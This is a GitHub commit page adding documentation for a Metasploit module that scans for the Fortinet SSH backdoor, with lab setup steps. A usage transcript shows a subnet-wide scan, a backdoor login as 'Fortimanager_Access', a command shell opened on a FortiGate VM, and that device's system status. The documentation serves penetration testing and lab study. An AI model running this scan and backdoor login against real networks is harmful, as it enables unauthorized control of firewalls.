Skip to content

Commit a9d6845

Browse files
wvuwvu
committed
Add module doc
1 parent 3880f6a commit a9d6845

File tree

1 file changed

+63
-0
lines changed

1 file changed

+63
-0
lines changed

documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md

Lines changed: 63 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
## Intro
2+
3+
This module scans for the Fortinet SSH backdoor and creates sessions.
4+
5+
## Setup
6+
7+
1. `git clone https://github.com/nixawk/labs`
8+
2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
9+
3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
10+
11+
## Usage
12+
13+
```
14+
msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
15+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
16+
rhosts => 192.168.212.0/24
17+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
18+
threads => 100
19+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
20+
21+
[*] Scanned 54 of 256 hosts (21% complete)
22+
[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
23+
[*] Scanned 65 of 256 hosts (25% complete)
24+
[*] Scanned 78 of 256 hosts (30% complete)
25+
[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
26+
[*] Scanned 104 of 256 hosts (40% complete)
27+
[*] Scanned 141 of 256 hosts (55% complete)
28+
[*] Scanned 154 of 256 hosts (60% complete)
29+
[*] Scanned 180 of 256 hosts (70% complete)
30+
[*] Scanned 205 of 256 hosts (80% complete)
31+
[*] Scanned 240 of 256 hosts (93% complete)
32+
[*] Scanned 256 of 256 hosts (100% complete)
33+
[*] Auxiliary module execution completed
34+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
35+
[*] Starting interaction with 1...
36+
37+
FortiGate-VM # get system status
38+
Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
39+
Virus-DB: 16.00560(2012-10-19 08:31)
40+
Extended DB: 1.00000(2012-10-17 15:46)
41+
Extreme DB: 1.00000(2012-10-17 15:47)
42+
IPS-DB: 4.00345(2013-05-23 00:39)
43+
IPS-ETDB: 0.00000(2000-00-00 00:00)
44+
Serial-Number: FGVM00UNLICENSED
45+
Botnet DB: 1.00000(2012-05-28 22:51)
46+
License Status: Evaluation license expired
47+
Evaluation License Expires: Thu Jan 28 13:05:41 2016
48+
BIOS version: 04000002
49+
Log hard disk: Need format
50+
Hostname: FortiGate-VM
51+
Operation Mode: NAT
52+
Current virtual domain: root
53+
Max number of virtual domains: 10
54+
Virtual domains status: 1 in NAT mode, 0 in TP mode
55+
Virtual domain configuration: disable
56+
FIPS-CC mode: disable
57+
Current HA mode: standalone
58+
Branch point: 228
59+
Release Version Information: GA Patch 4
60+
System time: Wed Feb 21 13:13:43 2018
61+
62+
FortiGate-VM #
63+
```

0 commit comments

Comments
 (0)